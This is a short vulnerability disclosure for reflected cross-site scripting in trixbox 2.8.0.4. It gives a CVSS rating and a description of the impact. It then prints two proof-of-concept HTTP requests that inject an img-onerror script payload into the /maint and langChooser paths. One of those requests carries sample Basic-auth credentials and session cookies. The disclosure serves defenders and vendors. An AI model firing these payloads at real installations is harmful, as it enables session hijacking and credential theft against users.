Title: TrixBox Multiple Cross Site Scripting Vulnerabilities
Affected Product: trixbox-2.8.0.4
Product Page: https://sourceforge.net/projects/asteriskathome/
CVSSv2 : (AV:N/AC:M/Au:S/C:P/I:P/A:N) Severity: Medium
Solution Status: N/A
Credit: Sachin Wagh (@tiger_tigerboy)
Description:
Cross-site scripting (XSS) is a type of computer security vulnerability typically found in web applications. XSS enables attackers to inject client-side scripts into web pages viewed by other users.
Impact:
An attacker may exploit these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
Proof-of-Concept:
- Affected Request-1:
| GET /maint/index.php/59b8b”><img%20src%3da%20onerror%3dalert(1)>4a1b2?packages HTTP/1.1 Host: 192.168.0.6 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://192.168.0.6/maint/index.php?configEdit Cookie: lng=en; security_level=0; PHPSESSID=7fasl890v1c51vu0d31oemt3j1; ARI=teev7d0kgvdko8u5b26p3335a2 Authorization: Basic bWFpbnQ6cGFzc3dvcmQ= Connection: keep-alive Upgrade-Insecure-Requests: 1 |
- Affected Request-2:
| GET /user/includes/language/langChooser.php/93797″><img%20src%3da%20onerror%3dalert(1)>cb889 HTTP/1.1 Host: 192.168.0.6 Accept: */* Accept-Language: en User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0) Connection: close Referer: http://192.168.0.6/user/includes/language/ Cookie: security_level=0; PHPSESSID=7fasl890v1c51vu0d31oemt3j1; ARI=teev7d0kgvdko8u5b26p3335a2; lng=en; template=classic |
Fig: XSS
Credit:
Information Security 